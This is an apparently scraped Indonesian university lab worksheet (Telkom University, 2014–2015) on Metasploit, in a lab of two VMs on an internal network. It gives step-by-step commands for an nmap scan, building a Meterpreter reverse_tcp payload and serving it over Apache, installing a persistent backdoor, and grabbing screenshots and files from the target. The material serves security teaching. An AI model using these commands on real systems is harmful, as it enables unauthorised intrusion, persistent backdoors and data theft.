jurnal metasploit(revisi)

12
Modul Praktek Network Security Keamanan Jaringan Telkom University 2014-2015 JURNAL PRAKTIKUM Skema Prakkum Komputer Penyerang Komputer Target Sistem Operasi - Ubuntu 12.04 IP Address - 192.168.1.2 Sistem Operasi - Windows 7 IP Address - 192.168.1.4 LANGKAH 1 Persiapkan komputer target 1. Ubah pengaturan jaringan Virtual box pada sistem operasi komputer target Seng > jaringan > Adapter 1 Centang : Nyalakan Adapter Jaringan Aached to : Jaringan Internal 1

Upload: setia-jul-ismail

Post on 10-Apr-2017

278 views

Category:

Education


1 download

TRANSCRIPT

Page 1: Jurnal metasploit(revisi)

Modul Praktek Network Security Keamanan Jaringan Telkom University

2014-2015

JURNAL PRAKTIKUM

Skema Praktikum

Komputer Penyerang Komputer Target

Sistem Operasi- Ubuntu 12.04

IP Address

- 192.168.1.2

Sistem Operasi- Windows 7

IP Address

- 192.168.1.4

LANGKAH 1

Persiapkan komputer target

1. Ubah pengaturan jaringan Virtual box pada sistem operasi komputer target Setting > jaringan > Adapter 1Centang : Nyalakan Adapter JaringanAttached to : Jaringan Internal

1

Page 2: Jurnal metasploit(revisi)

Modul Praktek Network Security Keamanan Jaringan Telkom University

2014-2015

Klik mulai untuk menghidupkan mesin virtual komputer target

2. Non aktifkan firewall pada komputer targetStart > Control Panel > System and Security > Windows Firewall > Costumize Setting >

3. Aktifkan remote Desktop pada komputer targetStart > Control Panel > System and Security > System > Remote settings

2

Page 3: Jurnal metasploit(revisi)

Modul Praktek Network Security Keamanan Jaringan Telkom University

2014-2015

4. Setting IP address pada komputer targetStart > Control Panel > Network and Internet > Network and Sharing Center > Local Area

Connections > Properties >Internet Protocol Version 4 (TCP/IPv4)>Use the following IP address:IP address : 192.168.1.4Subnet mask : 255.255.255.0Default gateway : 192.168.1.1

3

Page 4: Jurnal metasploit(revisi)

Modul Praktek Network Security Keamanan Jaringan Telkom University

2014-2015

LANGKAH 2

Persiapkan komputer penyerang

1. Ubah pengaturan jaringan Virtual box pada sistem operasi komputer target Setting > jaringan > Adapter 1Centang : Nyalakan Adapter JaringanAttached to : Jaringan Internal

4

Page 5: Jurnal metasploit(revisi)

Modul Praktek Network Security Keamanan Jaringan Telkom University

2014-2015

2. Klik mulai untuk menghidupkan mesin virtual komputer penyerang

5

Page 6: Jurnal metasploit(revisi)

Modul Praktek Network Security Keamanan Jaringan Telkom University

2014-2015

3. Masuk sebagai root

4. Setting IP static pada komputer penyerang melalui

Ubah isi file menjadi berikut :

Tekan ctrl + x lalu ketik y untuk menyimpan dan keluar dari editor 5. Restart networking untuk mendapatkan IP address yang telah dikonfigurasi

LANGKAH 3

Melakukan scanning dengan nmap

1. Lakukan foot printing untuk mendapatkan informasi sistem target

Output dari perintah diatas :

6

praktikum@praktikum:~$ sudo su

root@praktikum:~# nano /etc/network/interfaces

auto lo iface lo inet loopback

auto eth0iface eth0 inet loopbackaddress 192.168.1.3netmask 255.255.255.0network 192.168.1.0gateway 192.168.1.1broadcast 192.168.1.255

root@praktikum:~# /etc/init.d/networking restart

root@praktikum:~# nmap –sS –O 192.168.1.1/24 192.168.1.255/24

Page 7: Jurnal metasploit(revisi)

Modul Praktek Network Security Keamanan Jaringan Telkom University

2014-2015

LANGKAH 4

Uji koneksi dari komputer penyerang ke komputer target :

Output dari perintah diatas :

7

root@praktikum:~$ ping 192.168.1.4

Page 8: Jurnal metasploit(revisi)

Modul Praktek Network Security Keamanan Jaringan Telkom University

2014-2015

LANGKAH 5

Pastikan apache2 dalam keadaan aktif

LANGKAH 6

Melakukan exploitasi dan instalasi backdoor dari komputer penyerang ke komputer target dengan

metasploit1. Membuat payload di komputer penyerang untuk komputer target

Output dari perintah diatas:

2. Ketik msfconsole untuk memulai metasploit

3. Pilih payload yang sesuai dengan tujuan komputer target

4. setting payload yang tepat dari sesuai dengan tujuan exploitasi

5. Masukan IP komputer penyerang kedalam konfigurasi

Masukan port sesuai yang direncanakan pada pembuatan backdoor

8

root@praktikum:~#/etc/init.d/apache2 restart

msroot@praktikum:~# msfconsole

msf > use exploit/multi/handler

msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp

msf exploit(handler) > set LHOST 192.168.1.2

msf exploit(handler) > set LPORT 666

root@praktikum:~#msfpayload windows/meterpreter/reverse_tcpLHOST=192.168.1.2 LPORT=666 x > /var/www/praktikum.exe

msfconsole

Page 9: Jurnal metasploit(revisi)

Modul Praktek Network Security Keamanan Jaringan Telkom University

2014-2015

6. Lakukan exploitasi

7. Menyimpan backdoor pada komputer target dengan membuka browser pada komputer target,

masukan URL: http://192.168.1.2/praktikum.exe Klik run

Klik run

8. Sampai tahap ini, exploitasi sudah berhasil, kemudian kembali ke komputer penyerang untuk tahap

instalasi backdoor, baca informasi sistem komputer target

9

msf exploit(handler) > exploit

Page 10: Jurnal metasploit(revisi)

Modul Praktek Network Security Keamanan Jaringan Telkom University

2014-2015

Output dari perintah diatas:

9. Periksa IP Address pada komputer target

Output dari perintah diatas:

10

meterpreter > sysinfo

meterpreter > ifconfig

Page 11: Jurnal metasploit(revisi)

Modul Praktek Network Security Keamanan Jaringan Telkom University

2014-2015

10. Instalasi backdoor pada komputer penyerang terhadap komputer target

Catatan : 1037 adalah port yang terbuka tetapi belum digunakanOutput dari perintah diatas:

Baris terakhir menunjukan tempat penyimpanan backdoor dari komputer penyerang 11. Keluar dari aktifitas exploitasi

12. Lakukan eksploitasi kembali dengan menggunakan backdoor yang telah diinstal sebelumnya, dengan

mengganti port pada komputer penyerang sesuai port yang disetting sebelumnya yaitu port 1037.

13. Lakukan exploitasi

secara otomatis akan masuk ke payload meterpreter tanpa konfirmasi dari komputer target14. Melihat perintah yang tersedia pada meterpreter

15. Lakukan screenshoot komputer target

buka hasil screenshoot diatas, berikut lokasi penyimpanan

16. Melihat posisi direktori saat ini

11

meterpreter >run persistence –U -i 5 –p 1037 –r 192.168.1.2

meterpreter > exit

msf exploit(handler) > set LPORT 1037

msf exploit(handler) > exploit

meterpreter > help

meterpreter > screenshot

meterpreter > pwd

Page 12: Jurnal metasploit(revisi)

Modul Praktek Network Security Keamanan Jaringan Telkom University

2014-2015

Outputnya

Jika ingin pindah ke direktori yang lain, contoh :

17. Download file pada komputer target

contoh :

Maka file akan tersimpan pada direktori dimana msfconsole dimulai 18. Lakukan restart mesin target

12

meterpreter > cd D:/

meterpreter > download namafile

meterpreter > reboot